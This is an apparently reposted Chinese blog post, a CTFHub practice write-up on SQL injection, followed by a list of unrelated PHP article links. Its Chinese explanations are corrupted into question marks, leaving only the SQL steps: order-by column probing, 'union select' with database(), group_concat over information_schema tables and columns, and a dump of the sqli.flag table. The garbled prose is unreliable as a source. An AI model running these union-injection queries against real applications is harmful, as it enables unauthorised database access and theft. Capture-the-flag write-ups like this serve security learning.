CTFHub技能树web-sql注入

阅读量：294 次

发布时间：2019-03-01

本文共 1499 字，大约阅读时间需要 4 分钟。

???????????????????

??????????

??????????????????????????????????????SQL?????????????select * from news where id=1 order by 1???????????????????????????

????SELECT??????

?????????????????????SQL???select * from news where id=1 and 1=2 union select 1,database()

??????union?????????database()??????????????????????????????

????????????????

????????????????group_concat????columns??????????????????????????select * from news where id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

??????????????????????????

??????????????

????????????information_schema????????????????????????????????????select * from information_schema.tables where table_schema='sqli'

???group_concat??????????????????????????

????`union`?????

union????????????????????????SELECT???????????????????????????????????select * from news where id=1 and 1=2 union select 1,database()

???????????

??????????????????SQL???select * from information_schema.databases

????????????????????????????????

?????????????

?????????????????????select count(*) from information_schema.tables where table_schema='sqli'

??????????????????????

?????????????

???????????????????????select table_name from information_schema.tables where table_schema='sqli'

????????????????????

???????????????

?????????????????select column_name from information_schema.columns where table_name='flag'

?????????????

?????????????????

???????????????????????select * from sqli.flag

????????????????????????????????

转载地址：http://zhlx.baihongyu.com/

你可能感兴趣的文章

PHP获取当前页面的完整URL

php获取数据库中数据生成json，中文乱码问题的解决方案

php获取文件夹中文件的两种方法

PHP获取日期的一些方法总结

PHP获取本周的每一天的时间

php获取用户真实IP和防刷机制

php获取网页内容的三种方法

R-CNN算法优化策略

PHP规范PSR0和PSR4的理解

php解析ipa包，获取logo

R&Rstudio安装各种包

php设置cookie,在js中如何获取

php设置socket超时时间

php设计模式萨莱 pdf,PHP设计模式建造者模式

PHP设计模式之----观察者模式

php设计模式之装饰器模式

R&Python Data Science系列:数据处理(5)--字符串函数基于R(一)

PHP设计模式：观察者模式

php访问mysql（1）